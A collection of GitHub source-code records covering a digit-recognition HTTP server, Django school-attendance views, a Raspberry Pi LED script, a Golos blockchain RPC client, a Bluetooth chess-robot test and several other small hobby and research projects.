BaseHTTPRequestHandler\nfrom logger import logger\nimport sys\nimport traceback\nfrom urllib import parse\n\nclass DigitRegHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n url = parse.urlparse(self.path)\n param_dict = parse.parse_qs(url.query)\n inputdir = param_dict.get('inputdir',[''])[0]\n outputdir = param_dict.get('outputdir',[''])[0]\n mode = param_dict.get('mode',[''])[0]\n if len(inputdir) <= 0 or len(outputdir) <= 0 or len(mode) <= 0:\n self.response(\"valid params\")\n return\n try:\n if mode == \"price\":\n infer_main(inputdir, \"model\", outputdir, mode)\n self.response(\"\")\n elif mode == \"barcode\":\n infer_main(inputdir, \"model\", outputdir, mode)\n self.response(\"\")\n else:\n self.response(\"UNKNOWN MODE: {}\".format(mode))\n except:\n error = traceback.format_exc()\n self.response(error)\n\n def response(self, content):\n if len(content) <= 0:\n self.send_response(200)\n content = \"success\"\n else:\n self.send_response(500)\n self.send_header(\"Content-type\", \"text/html; charset=utf-8\")\n self.send_header(\"Content-Length\", str(len(content)))\n self.end_headers()\n self.wfile.write(content.encode('utf-8'))\n\nif __name__ == '__main__':\n from http.server import HTTPServer\n server = HTTPServer(('localhost', 8081), DigitRegHandler)\n print('Starting server, use to stop')\n try:\n server.serve_forever()\n except:\n sys.exit(-1)\n","repo_name":"xinshoulzc/ticket_reg","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33882365753","text":"from django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required, user_passes_test,permission_required\nfrom rest_framework.response import Response\nfrom django.core.files.storage import FileSystemStorage\nfrom resources.forms import adminForm, resourceForm\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom resources.models import admin, resource\nfrom rest_framework.views import APIView\nfrom django.utils import timezone\nfrom resources.serializer import adminSerializer\nimport json\nimport re\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom resources.models import admin, resource, content_type\nfrom state import models as state_models\nfrom country import models as 
country_models\nfrom city import models as city_models\nfrom board.models import Board as board_models\nfrom medium.models import Medium as medium_models\nfrom school import models as school_models\nfrom class_master import models as class_models\nfrom division.models import Division as division_models\nfrom teacher.models import Teacher as teacher\nfrom users.models import UserProfile,User\nfrom subject.models import Subject\nfrom bank import models as bank_models\nfrom users import models as user_models\nfrom rest_framework import status\nfrom operator import itemgetter\nfrom django.template.defaulttags import register\nfrom division import models as division\nfrom student import models as student\nfrom attendance.models import Attendance as attendance\nfrom django.db.models.functions import Trunc\nfrom datetime import datetime \n\n# Create your views here.\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n@csrf_exempt\ndef get_division_old(school_id):\n division_data = []\n division_list = division_models.objects.filter(school_id=school_id).values_list('id', 'division_name')\n for i in division_list:\n case2 = {'id': i[0], 'name': i[1].capitalize()}\n division_data.append(case2)\n division_data = sorted(division_data, key=itemgetter('name'))\n return division_data\n\n@csrf_exempt\ndef get_division(school_id,division_id):\n division_data = []\n print(division_id)\n division_list = division.school_division_mapping.objects.filter(division_id=division_id).values_list('division_id__id','division_id__division_name','class_id__id')\n for i in division_list:\n case2 = {'id': i[0], 'name': i[1].capitalize(),'class_id':i[2]}\n division_data.append(case2)\n division_data = sorted(division_data, key=itemgetter('name'))\n return division_data\n\n@csrf_exempt\ndef get_class(school_id,class_id):\n class_data = []\n class_list = class_models.class_master.objects.filter(pk=class_id).values_list('id', 'class_name')\n print(class_list)\n for i in class_list:\n case2 = {'id': i[0], 'name': i[1]}\n class_data.append(case2)\n return class_data\n\n@login_required\n@permission_required('attendance.add_attendance', raise_exception=True)\ndef mark_attn(request):\n if request.method == 'GET': \n student_list=[]\n request_user_profile=User.objects.filter(username=str(request.user))\n request_user=UserProfile.objects.filter(user=request_user_profile[0].id)\n pr = teacher.objects.filter(user = (request_user[0].id))\n class_division=division.teacher_class_mapping.objects.filter(class_teacher=(pr[0].id))\n print(class_division)\n print(class_division[0].school_division.id)\n list_of_studentid = division.student_class_mapping.objects.filter(school_division=class_division[0].school_division.id)\n print(list_of_studentid[0].id)\n list_of_students= student.Student.objects.filter(pk__in=list_of_studentid).values_list('id','first_name','last_name')\n print(list_of_students)\n for i in list_of_students:\n case2 = {'id': i[0], 'name': str(i[1]+\" \"+i[2])}\n student_list.append(case2)\n return render(request, 'markattd.html', {'list':student_list})\n else:\n response=JsonResponse({'status': 'error', 'msg': 'Bad Request'})\n return response\n\n@login_required\ndef save_attendance(request):\n if request.method=='POST':\n all_students=[]\n student_list=request.POST.getlist('students')\n date = request.POST.get('attd_date') \n request_user_profile=User.objects.filter(username=str(request.user))\n request_user=UserProfile.objects.filter(user=request_user_profile[0].id)\n pr = 
teacher.objects.filter(user = (request_user[0].id))\n class_division=division.teacher_class_mapping.objects.filter(class_teacher=(pr[0].id))\n list_of_studentid = division.student_class_mapping.objects.filter(school_division=class_division[0].school_division.id)\n\n list_of_students= student.Student.objects.filter(pk__in=list_of_studentid).values_list('id')\n print(list_of_students)\n for i in list_of_students:\n all_students.append(i[0])\n school_division=division.school_division_mapping.objects.filter(pk=class_division[0].school_division.id)\n for i in all_students:\n student_id=student.Student.objects.filter(pk=i)\n if (str(i) in student_list):\n new_attd=attendance.objects.create(date=date,student_id=student_id[0],school_division=school_division[0],teacher_id=pr[0],is_present=1)\n else:\n new_attd=attendance.objects.create(date=date,student_id=student_id[0],school_division=school_division[0],teacher_id=pr[0],is_present=0)\n response=JsonResponse({'status': 'success', 'msg': 'Attendance added sucessfully'})\n return response\n\n@login_required\n# @permission_required('attendance.view_attendance', raise_exception=True)\ndef list_attendance(request):\n user=user_models.User.objects.get(username=request.user.username)\n request_user_profile=User.objects.filter(username=str(request.user))\n\n if user.has_perm('attendance.view_attendance'):\n data = []\n group_list=[]\n ob = admin()\n resource_list = {}\n count = 1\n request_user_profile=User.objects.filter(username=str(request.user))\n request_user=UserProfile.objects.filter(user=request_user_profile[0].id)\n user_group = request.user.groups.values_list('name', flat=True)\n if 'role' in request.session:\n roles_used = request.session['role']\n print(user_group)\n for i in user_group:\n print(i)\n j=i.split('-',2)\n print(j[0])\n group_list.append(j[0])\n print(request_user_profile[0].username)\n if (roles_used==\"Parent\"):\n pr=request_user_profile\n class_id=student.Student.objects.filter(parent=pr[0].id).values_list('class_name','division','id')\n class_details=class_id[0][0]\n division_details=class_id[0][1]\n student_id=class_id[0][2]\n else:\n pr = teacher.objects.filter(user = (request_user[0].id))\n class_division=division.teacher_class_mapping.objects.filter(class_teacher=(pr[0].id))\n print(class_division)\n print(class_division[0].school_division.id)\n division_id=division.school_division_mapping.objects.filter(pk=class_division[0].school_division.id)\n division_details=division_id[0].division_id.id\n class_details=division_id[0].class_id.id\n school_id=UserProfile.objects.filter(user=request_user_profile[0].id).values_list('school_id')\n print(school_id)\n class_list = get_class(school_id[0][0],class_details)\n division_list = get_division(school_id[0][0],division_details) \n if request.method == 'GET':\n print(\"call122222\")\n context = {'data':data,'class_list':class_list,'division_list':division_list}\n template = 'attendance_list.html'\n return render(request, template, context)\n\n else:\n date_list=[]\n student_names=[]\n class_lists=request.POST.get('class_list')\n division_lists=request.POST.get('division_list')\n start_date = request.POST.get('start_date')\n end_date = request.POST.get('end_date')\n # roles_used = request.POST.get('roles')\n\n print(roles_used)\n print(class_lists)\n print(division_lists)\n print(start_date)\n print(end_date)\n class_id=class_models.class_master.objects.filter(pk=class_lists)\n print(class_id)\n division_id=division.Division.objects.filter(pk=division_lists)\n print(division_id)\n 
print(class_id[0])\n print(division_id[0])\n print(school_id[0])\n # print(school_id[0][0])\n school_division=division.school_division_mapping.objects.filter(class_id=class_id[0],division_id=division_id[0],school_id=school_id[0][0])\n \n if ((roles_used==\"Parent\") and (school_division)):\n \n student_group= attendance.objects.filter(date__range=(start_date, end_date),school_division=school_division[0],student_id=student_id).values_list('student_id').distinct()\n elif school_division:\n student_group= attendance.objects.filter(date__range=(start_date, end_date),school_division=school_division[0]).values_list('student_id').distinct()\n else:\n response=JsonResponse({'status': 'error', 'msg': 'Class division combination doesnt exist'})\n return response\n dates_list=[\"Sr No\",\"Roll Number\",\"Student Name\"]\n if student_group:\n for students in student_group:\n students_list=attendance.objects.filter(date__range=(start_date, end_date),school_division=school_division[0]).filter(student_id=students[0]).order_by('date')\n\n serialised_data=[]\n student_details=student.Student.objects.filter(pk=students[0])\n student_name=student_details[0].first_name+\" \"+student_details[0].last_name\n serialised_data.append(count)\n serialised_data.append(student_details[0].roll_number)\n student_names=student_name\n serialised_data.append(student_names)\n attendance_status=[]\n for i in students_list:\n present_status=('Present' if i.is_present else 'Absent')\n date_list.append(str(i.date))\n attendance_status.append(present_status)\n count = count + 1\n serialised_data.extend(attendance_status)\n data.append(serialised_data)\n dates_list.extend(date_list[-(len(attendance_status)):])\n else:\n response=JsonResponse({'status': 'error', 'msg': 'Attendance for the selected period doesnot exist'})\n return response\n context = {'data': data,'student_list':student_names,'date_list':dates_list,'class_list':class_list,'division_list':division_list,'attdate':start_date,'enddate':end_date,'class_lists':class_lists,'division':division_id[0].division_name}\n template = 'attendance_list.html'\n return render(request, template, context)\n\n else:\n return render(request,'forbidden_page.html')\n\n\n\n","repo_name":"pheonixfrmash/school_app","sub_path":"attendance/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40755740958","text":"#!/usr/bin/env python\n##### This program makes two LEDS blink. 
Pressing the switch changes the delay.\n##### This program has been organized a bit more and exits properly\nimport RPi.GPIO as GPIO\nimport time\n\n# pins for LEDs\nL1 = 25\nL2 = 20\nSW1 = 6\ndelay = 0.8\n\n\n#set up GPIO\ndef setup():\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(L1, GPIO.OUT)\n GPIO.setup(L2, GPIO.OUT)\n GPIO.setup(SW1, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n#turn on LED\ndef flash():\n GPIO.output(L1, GPIO.HIGH)\n GPIO.output(L2, GPIO.HIGH)\n while True:\n if (GPIO.input(SW1) == 0): #switch is pressed\n delay = 0.1\n else:\n delay = 0.8\n GPIO.output(L1,GPIO.HIGH)\n GPIO.output(L2,GPIO.LOW)\n time.sleep (delay)\n GPIO.output(L1,GPIO.LOW)\n GPIO.output(L2,GPIO.HIGH)\n time.sleep (delay)\n\ndef main():\n setup()\n flash()\n\ntry: # try-catch is needed to gracefully handle CTRL-C\n main()\nexcept KeyboardInterrupt:\n GPIO.cleanup() # clean up GPIO on CTRL+C exit\n","repo_name":"salamander2/leds","sub_path":"light5.py","file_name":"light5.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"75048714888","text":"#!/usr/bin/python\nfrom lettuce import *\nimport config\nimport os\n\ndef db_path(database):\n db_path = os.path.join(os.getcwd(), 'features', 'terrain', 'TestData', 'databases', database)\n return db_path\n\ndatabases = {\"corrupt\": db_path(\"corrupt_db\"),\n \"empty\": db_path(\"empty_db\"),\n \"351\": db_path(\"351sqlitedb\"),\n \"bz17556\": db_path(\"bz17556_backup_80\")\n }\n\n@step('I have (a|an|the) \"(.*?)\" miro db')\ndef reset_database(self, db):\n if db == \"fresh\": \n world.config.set_def_db_and_prefs()\n else:\n world.config.replace_database(databases[db])\n\n","repo_name":"jdragojevic/mirosalad","sub_path":"tests.sikuli/features/terrain/steps/setup_steps.py","file_name":"setup_steps.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"8524965275","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"login\", views.login_view, name=\"login\"),\n path(\"logout\", views.logout_view, name=\"logout\"),\n path(\"register\", views.register, name=\"register\"),\n path(\"categories\", views.categories, name=\"categories\"),\n path(\"categories/\", views.categories, name=\"categorie\"),\n path(\"auction/\", views.auction, name=\"auction\"),\n path(\"auction//comment\", views.comment, name=\"comment\"),\n path(\"auction/close\", views.close, name=\"close\"),\n path(\"create\", views.create, name=\"create\"),\n path(\"watch\", views.watch, name=\"watch\"),\n]\n","repo_name":"victorpasson/commerce-cs50w","sub_path":"auctions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12479609401","text":"# -*- coding: utf-8 -*-\nfrom django.core.urlresolvers import reverse_lazy\n\n#GENERAL SETTINGS\nDETAILS_TABS = {\n 'info' : True,\n '3d' : True,\n 'images' : True,\n 'events' : True,\n 'stakeholder' : True,\n 'discussion' : True,\n 'map' : True,\n 'etherpad' : True,\n}\n\nORDER_BTNS = [\n {'value' : 'name', 'text' : 'Name'},\n {'value' : '-created', 'text' : 'Datum'},\n # {'value' : '-num_stakeholder', 'text' : '# Beteiligte'},\n {'value' : '-ratings_avg', 'text' : 'Bewertung'},\n # {'value' : '-ratings_count', 'text' : '# Bewertungen'},\n {'value' : '-wbcrating', 'text' : 'Punkte'},\n]\n\n#SWITCH ON/OFF PARTS OF THE WBC APP\nGENERAL_CONTENT = {\n 'blog' : True,\n 'lexikon' : True,\n 'account' : True,\n 'wbcrating': True,\n 'number_votes': 3,\n 'starrating': True,\n 'featured' : True,\n 'updownvote': True,\n 'social_media_share': True,\n}\n\n#TOP BOXES ON STARTPAGE\nSTARTPAGE_OVERVIEW_ICONS = [\n {'text' : 'Suche nach Ideen & Projekten', 'icon': 'fa-map-o', 'overlay': 'Finde 3000+ Baupläne', 'link' : reverse_lazy('search') },\n {'text' : 'Suche nach Ideen & Projekten', 'icon': 'fa-map-o', 'overlay': 'Finde 3000+ Baupläne', 'link' : reverse_lazy('search') },\n {'text' : 'Suche nach Ideen & Projekten', 'icon': 'fa-map-o', 'overlay': 'Finde 3000+ Baupläne', 'link' : reverse_lazy('search') },\n]\n\n#BOTTOM BOXES ON STARTPAGE\nSTARTPAGE_TOPIC_ICONS = [\n {'text' : 'Suche nach Ideen & Projekten', 'icon': 'fa-map-o', 'overlay': 'Finde 3000+ Baupläne', 'link' : reverse_lazy('search') }\n]\n\n\n#SEARCH\nDEFAULT_VIEW_MAP = True # True = map, False = kachel, None = list\nSHOW_ENTITY_FILTER = True # kann man nach entities filtern\nSHOW_ADDITIONAL_FILTER = True # switchtes additional filters on/off\nTERMINATED_PROJECTS = True\n","repo_name":"webuildcity/polis","sub_path":"city/content_settings.py","file_name":"content_settings.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"31239817351","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom codim1.core import *\nfrom codim1.assembly import *\nfrom codim1.fast_lib import *\nfrom codim1.post import *\nimport codim1.core.tools as tools\n\n\nx_pts = 30\ny_pts = 30\nn_elements = 40\ndegree = 1\nquad_min = degree + 1\nquad_max = 3 * degree\nquad_logr = 3 * degree + 1\nquad_oneoverr = 3 * degree + 1\ninterior_quad_pts = 13\n\nek = ElasticKernelSet(1.0, 0.25)\n\nleft_end = np.array((-1.0, 0.0))\nright_end = np.array((1.0, -0.0))\nmesh = simple_line_mesh(n_elements, left_end, right_end)\n# tools.plot_mesh(mesh)\n# plt.show()\nbf = 
basis_from_degree(degree)\nqs = QuadStrategy(mesh, quad_min, quad_max, quad_logr, quad_oneoverr)\napply_to_elements(mesh, \"basis\", bf, non_gen = True)\napply_to_elements(mesh, \"continuous\", True, non_gen = True)\napply_to_elements(mesh, \"qs\", qs, non_gen = True)\napply_to_elements(mesh, \"bc\",\n BC(\"crack_displacement\", ConstantBasis([1.0, 0.0])),\n non_gen = True)\nsgbem_dofs(mesh)\n\nmatrix, rhs = sgbem_assemble(mesh, ek)\nimport ipdb;ipdb.set_trace()\nsoln_coeffs = np.linalg.solve(matrix, rhs)\n\n\nx, u, t = evaluate_boundary_solution(mesh, soln_coeffs, 8)\n\nplt.figure(1)\ndef plot_tx():\n plt.plot(x[0, :], t[0, :])\n plt.xlabel(r'X')\n plt.ylabel(r'$t_x$', fontsize = 18)\ndef plot_ty():\n plt.plot(x[0, :], t[1, :])\n plt.xlabel(r'X')\n plt.ylabel(r'$t_y$', fontsize = 18)\nplot_tx()\n# plt.plot(x[0, :], correct)\nplt.figure()\nplot_ty()\nplt.show()\n\n# tx = t[0, :]\n# ty = t[1, :]\n# distance_to_left = np.sqrt((x[:, 0] - left_end[0]) ** 2 +\n# (x[:, 1] - left_end[1]) ** 2)\n#\n# x = np.linspace(-5, 5, x_pts)\n# # Doesn't sample 0.0!\n# y = np.linspace(-15, 15, y_pts)\n# X, Y = np.meshgrid(x, y)\n#\n# x = np.linspace(-5, 5, x_pts)\n# # Doesn't sample 0.0!\n# y = np.linspace(-5, 5, y_pts)\n# sxx = np.zeros((x_pts, y_pts))\n# sxy = np.zeros((x_pts, y_pts))\n# sxy2 = np.zeros((x_pts, y_pts))\n# syy = np.zeros((x_pts, y_pts))\n# displacement = np.zeros((x_pts, y_pts, 2))\n# def fnc(x,d):\n# if d == 0 and x[0] <= 1.0 and x[0] >= -1.0:\n# return 1.0\n# return 0.0\n# # displacement_func = BasisFunctions.from_function(fnc)\n# #\n# # ip = InteriorPoint(mesh, dh, qs)\n# # for i in range(x_pts):\n# # print i\n# # for j in range(y_pts):\n# # displacement[j, i, :] += ip.compute((x[i], y[j]),\n# # np.array([0.0, 0.0]),\n# # k_t, displacement_func)\n# # # sxx[j, i], sxy[j, i] = 0.5 * point_src(np.array(x[i], y[j]),\n# # # np.array((0.0, 1.0)))\n# # # sxy2[j, i], syy[j, i] = 0.5 * point_src(np.array(x[i], y[j]),\n# # # np.array((1.0, 0.0)))\n# # int_ux = displacement[:, :, 0]\n# # int_uy = displacement[:, :, 1]\n# #\n# # plt.figure(7)\n# # plt.imshow(int_ux)\n# # plt.title(r'Derived $u_x$')\n# # plt.colorbar()\n# #\n# # plt.figure(8)\n# # plt.imshow(int_uy)\n# # plt.title(r'Derived $u_y$')\n# # plt.colorbar()\n#\n# # plt.figure(9)\n# # plt.imshow(sxy)\n# # plt.title(r'Derived $s_{xy}$')\n# # plt.colorbar()\n# #\n# # plt.figure(10)\n# # plt.imshow(sxx)\n# # plt.title(r'Derived $s_{xx}$')\n# # plt.colorbar()\n# # plt.figure(11)\n# # plt.imshow(sxy2)\n# # plt.title(r'Derived $s_{xy2}$')\n# # plt.colorbar()\n# #\n# # plt.figure(12)\n# # plt.imshow(syy)\n# # plt.title(r'Derived $s_{yy}$')\n# # plt.colorbar()\n# # plt.figure(11)\n# # plt.imshow(int_ux - exact_grid_ux)\n# # plt.title(r'Error in $u_x$')\n# # plt.colorbar()\n#\n# plt.show()\n","repo_name":"tbenthompson/codim1","sub_path":"examples/dislocation.py","file_name":"dislocation.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"534720986","text":"# Task 10. 
Money Counting Game\n\n# Get user data\ncoin_1 = int(input(\"Select the quantity of one cent coin: \"))\ncoin_5 = int(input(\"Select the quantity of five cent coin: \"))\ncoin_10 = int(input(\"Select the quantity of ten cent coin: \"))\ncoin_25 = int(input(\"Select the quantity of twenty-five cent coin: \"))\n\n# Show user values\nprint (\"Your choise:\")\nprint (\"1 cent: \", coin_1, \"pcs\")\nprint (\"5 cent: \", coin_5, \"pcs\")\nprint (\"10 cent: \", coin_10, \"pcs\")\nprint (\"25 cent: \", coin_25, \"pcs\")\n\n# Set values\ndollar = 100\ncent_1 = 1\ncent_5 = 5\ncent_10 = 10\ncent_25 = 25\n\n# Calculation\ntotal_cent_1 = coin_1 * cent_1\ntotal_cent_5 = coin_5 * cent_5\ntotal_cent_10 = coin_10 * cent_10\ntotal_cent_25 = coin_25 * cent_25\ntotal_sum = total_cent_1 + total_cent_5 + total_cent_10 + total_cent_25\n\n# Return result\nif total_sum == dollar:\n\tprint(\"CONGRATULATIONS!!! YOU WIN!!!\")\nelif total_sum > dollar:\n\tprint(\"Total value of the coins is more than one dollar\")\nelif total_sum < dollar:\n\tprint(\"Total value of the coins is less than one dollar\")","repo_name":"ArtDenis83/Tasks-of-Tony-Gaddis","sub_path":"Chapter 3/Ch3_task_10.py","file_name":"Ch3_task_10.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41586049719","text":"# -*- coding: utf-8 -*-\n\nfrom requests import Session\nfrom requests.adapters import HTTPAdapter\nfrom requests.exceptions import ConnectionError\n\nimport json\nfrom time import sleep, time\nfrom pprint import pprint\nfrom itertools import cycle\n\nfrom .storage import nodes, api_total\n#from .proxy import Proxy\n\nclass Http():\n\n\thttp = Session()\n\tproxies = None\n\n\nclass RpcClient(Http):\n\n\tRPS_DELAY = 1.00\t# ~3 requests per second\n\tlast_request = 0.0\n\t\n\t\"\"\" Simple Steem JSON-RPC API\n\t\tThis class serves as an abstraction layer for easy use of the Steem API.\n\n\t\trpc = RpcClient(nodes=nodes) or rpc = RpcClient()\n\t\tArgs:\n\t\t\tnodes (list): A list of Steem HTTP RPC nodes to connect to.\n\t\t\n\t\tany call available to that port can be issued using the instance\n\t\trpc.call('command', *parameters)\n\t\"\"\"\n\t\n\theaders = {'User-Agent': 'thallid', 'content-type': 'application/json'}\n\n\t\n\tdef __init__(self, report=False, **kwargs):\n\n\t\tself.api_total = api_total\n\t\t\n\t\tself.report = report\n\t\tself.PROXY = kwargs.get(\"PROXY\", False)\n\t\tif self.PROXY: self.proxies = Proxy()\n\n\t\tself.nodes = cycle(kwargs.get(\"nodes\", nodes))\t\t# Перебор нод\n\t\tself.url = next(self.nodes)\n\t\t\n\t\tself.num_retries = kwargs.get(\"num_retries\", 3)\t\t# Количество попыток подключения к ноде\n\t\tadapter = HTTPAdapter(max_retries=self.num_retries)\n\t\tfor node in nodes:\n\t\t\tself.http.mount(node, adapter)\n\t\t\t\n\t\t\n\tdef get_response(self, payload):\n\t\n\t\tdata = json.dumps(payload, ensure_ascii=False).encode('utf8')\n\t\n\t\twhile True:\n\t\t\t\t\n\t\t\tn = 1\n\t\t\tproxies = self.proxies.get_http() if self.PROXY else None\n\t\t\twhile n < self.num_retries:\n\t\t\t\ttry:\n\t\t\t\t\n\t\t\t\t\t# Ограничение по запросам в секунду\n\t\t\t\t\tdelay = self.RPS_DELAY - (time() - self.last_request)\n\t\t\t\t\tif delay > 0: sleep(delay)\n\t\t\t\t\n\t\t\t\t\t#response = self.http.post(self.url, data=data, headers=self.headers, proxies=proxies, auth=auth)\n\t\t\t\t\tresponse = self.http.post(self.url, data=data, headers=self.headers, proxies=proxies, timeout=30)\n\t\t\t\t\tself.last_request = 
time()\n\t\t\t\t\t\n\t\t\t\t\tif response.status_code == 503:\n\t\t\t\t\t\tproxies = self.proxies.new_http() if self.PROXY else None\t# next proxy\n\t\t\t\t\t\tprint('new proxy', proxies)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn response\n\t\t\t\t\t\n\t\t\t\t#except ConnectionError as ce:\n\t\t\t\texcept:\n\t\t\t\t\t#print('ce', ce)\n\t\t\t\t\tsleeptime = (n - 1) * 2\n\t\t\t\t\tif self.report:\n\t\t\t\t\t\tprint(\"Lost connection to node during rpcconnect(): %s (%d/%d) \" % (self.url, n, self.num_retries))\n\t\t\t\t\t\tprint(\"Retrying in %d seconds\" % sleeptime)\n\t\t\t\t\tsleep(sleeptime)\n\t\t\t\t\tn += 1\n\t\t\t\t\t\n\t\t\tself.url = next(self.nodes)\t\t\t# next node\n\t\t\tprint(\"Trying to connect to node %s\" % self.url, 'error in get_response rpc_client', proxies)\n\t\t\t\t\n\t\treturn False\n\n\t\t\t\t\t\n\tdef call(self, name, *params, **kwargs):\n\t\n\t\t# Определяем для name своё api\n\t\tapi = self.api_total[name]\n\t\t#method = kwargs.get('method', 'condenser_api.')\t#steem\n\t\tmethod = kwargs.get('method', 'call')\n\t\tparameters = kwargs.get('params', [api, name, params])\n\t\t#payload = {\"method\": method + name, \"params\": parameters, \"id\": 1, \"jsonrpc\": '2.0'}\t#steem\n\t\tpayload = {\"method\": method, \"params\": parameters, \"id\": 1, \"jsonrpc\": '2.0'}\n\t\tresult = None\n\t\t\n\t\tn = 1\n\t\twhile n < self.num_retries:\n\t\t\tresponse = self.get_response(payload)\n\n\t\t\tif response:\n\t\t\t\tif response.status_code == 200:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tres = response.json()\n\t\t\t\t\t\tif 'error' in res:\n\t\t\t\t\t\t\tif self.report:\n\t\t\t\t\t\t\t\t#pprint(res[\"error\"][\"message\"])\n\t\t\t\t\t\t\t\tprint('ERROR IN RES', res[\"error\"][\"message\"])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tresult = res[\"result\"]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint('ERROR JSON', response)\n\t\t\t\t#elif response.status_code == 503:\n\t\t\t\t#\tproxies = self.proxies.new_http() if self.PROXY else None\t# next proxy\n\t\t\t\t#\tprint('new proxy', proxies)\n\n\t\t\t\telse:\n\t\t\t\t\tif self.report:\n\t\t\t\t\t\tprint(n, 'ERROR status_code', response.status_code, response.text)\n\t\t\telse:\n\t\t\t\tprint('not connection to node', self.url)\n\t\t\t\t\n\t\t\tprint('response', response)\n\t\t\tn += 1\n\t\t\tself.url = next(self.nodes)\t\t\t# next node\n\t\t\tsleep(n * 2)\n\t\t\tprint(\"Trying to connect to node %s\" % self.url, 'for method', name)\n\t\t\n\t\treturn result\n\n\n#----- main -----\nif __name__ == '__main__':\n\tpass","repo_name":"ksantoprotein/thallid-golos","sub_path":"tgolosbase/rpc_client.py","file_name":"rpc_client.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"14134314582","text":"'''\nBluetooth/Pyjnius example\n=========================\nThis was used to send some bytes to an arduino via bluetooth.\nThe app must have BLUETOOTH and BLUETOOTH_ADMIN permissions (well, i didn't\ntested without BLUETOOTH_ADMIN, maybe it works.)\nConnect your device to your phone, via the bluetooth menu. 
After the\npairing is done, you'll be able to use it in the app.\n'''\nfrom jnius import autoclass\nimport time\nbmsgcount = 0\n\nBluetoothAdapter = autoclass('android.bluetooth.BluetoothAdapter')\nBluetoothDevice = autoclass('android.bluetooth.BluetoothDevice')\nBluetoothSocket = autoclass('android.bluetooth.BluetoothSocket')\n\ndef breceivemsg(recv_stream):\n global bmsgcount\n bmsgcount += 1\n\n while recv_stream.ready != None:\n try:\n line = recv_stream.readLine()\n except jnius.jnius.JavaException as e:\n print(\"JavaException: \", e, rfsocket.connected)\n \n except ValueError as e:\n print(\"Misc error: \", e)\n\n try:\n print(msgcount, line)\n except ValueError:\n pass\n \n \nUUID = autoclass('java.util.UUID')\n\ndef get_socket_stream(name):\n paired_devices = BluetoothAdapter.getDefaultAdapter().getBondedDevices().toArray()\n socket = None\n for device in paired_devices:\n if device.getName() == name:\n socket = device.createRfcommSocketToServiceRecord(\n UUID.fromString(\"00001101-0000-1000-8000-00805F9B34FB\"))\n recv_stream = socket.getInputStream()\n send_stream = socket.getOutputStream()\n break\n socket.connect()\n return recv_stream, send_stream\n\nif __name__ == '__main__':\n recv_stream, send_stream = get_socket_stream('HC-05')\n #send_stream.write('hello\\n')\n #send_stream.flush()\n #print(recv_stream.readline())\n #send_stream.write('hello again\\n')\n #send_stream.flush()\n #print(recv_stream.readline())\n \n # init steppers\n time.sleep(0.2)\n send_stream.write((\"G28\" + \"\\r\").encode()) # steppers off, initialize\n send_stream.flush()\n time.sleep(0.2)\n receivemsg(recv_stream)\n time.sleep(0.2)\n \n # steppers on\n input(\"Press Enter to switch on steppers and start game\")\n something = TextInput('Happy Christmas', 'Press Enter to switch on steppers and start game')\n something = TextInput(text='Press Enter to switch on steppers and start game')\n send_stream.write((\"M17\" + \"\\r\").encode()) # Switch on steppers\n send_stream.flush()\n time.sleep(0.2)\n receivemsg(recv_stream)\n time.sleep(0.2)\n receivemsg(recv_stream)\n \n gstring = \"G1\" + \" X0\" + \" Y200\" + \" Z60\" + \"\\r\"\n send_stream.write(gstring.encode())\n send_stream.flush()\n time.sleep(0.2)\n receivemsg(recv_stream)","repo_name":"rpd123/chess-robot","sub_path":"versiongui/old/bluetoothtest.py","file_name":"bluetoothtest.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"16"} +{"seq_id":"9915595550","text":"from PyQt4 import QtGui, QtCore, QtOpenGL\nfrom PyQt4.QtOpenGL import QGLWidget\nimport OpenGL.GL as gl\nimport OpenGL.arrays.vbo as glvbo\nimport numpy as np\n\nclass PlotWidget(QGLWidget):\n # default window size\n width, height = 1000, 800\n mousepressed = False\n ar = width/float(height)\n draginfo = np.zeros([2,2],dtype =np.float32)\n vselected = []\n initialized = False\n\n def initializeGL(self):\n \"\"\"Initialize OpenGL, VBOs, upload data on the GPU, etc.\n \"\"\"\n self.setMouseTracking(True)\n # background color\n gl.glClearColor(0,0,0,0)\n self.arrayVbo = glvbo.VBO(self.mesh.array)\n self.indexVbo = glvbo.VBO(self.mesh.index, target=gl.GL_ELEMENT_ARRAY_BUFFER)\n self.initialized = True\n\n def meshChanged(self, mesh):\n self.mesh = 